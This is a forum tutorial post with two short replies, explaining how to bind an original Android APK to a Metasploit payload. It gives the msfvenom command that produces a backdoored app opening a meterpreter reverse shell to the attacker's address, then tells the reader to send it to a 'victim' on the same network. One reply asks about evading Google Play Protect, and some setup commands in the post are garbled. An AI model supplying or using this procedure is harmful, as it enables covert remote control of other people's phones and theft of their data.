Forum Thread: How to Bind Original Apk into a Payload with Msfvenom

Hi I am Sanaan. Today i will be showing you How to bind Original Apk into a Payload with msfvenom. So Lets get started

Step 1: Install the Requirements

First we need to download Apktooland The apk which we are going to inject The Payload.
So to download the apktool go to this link

And Download the Latest Version of Apktool and then rename it to apktool.jar . And now we need to download the linux wrapper script if your on other OS please download their wrapper script for now.

I am using Kali so Here is the Linux Wraper Script Now save it as apktool. Move apktool.jar and apktool to


After That type apktool in the terminal to verify if its working and then if you see this on top. Picked up JAVAOPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Then you have to type this command whenever you are using apktool *SILENTJAVAOPTIONS="$JAVA_OPTIONS"
alias='java "$SILENTJAVA_OPTIONS"'*
Remember to write this on your notepad. You have to copy and paste this in terminal

And now install your apk file of your choice

Step 2: Lets Try It

Type msfvenom -x yourapkfilename.apk -p android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=4444 -o /root/Desktop/yourbackdooredapkfilename.apk

And Our Backdoor apk is Created

Step 3: Send It to Your Victim Who Is in the Same Network

Finally send it to your victim. Who is in The Same Network As You

Hope You Like My Post. And this MY Very First Post and i will be doing a part-2 Which is in the same concept but using ngrok. And If You Have Any Problems Please let me know Bye

2 Responses

anyone got anything new on Google play protect for apk payload.

It still shows "Picked up JAVAOPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true" while starting apktool. How do I fix this?

Share Your Thoughts

  • Hot
  • Active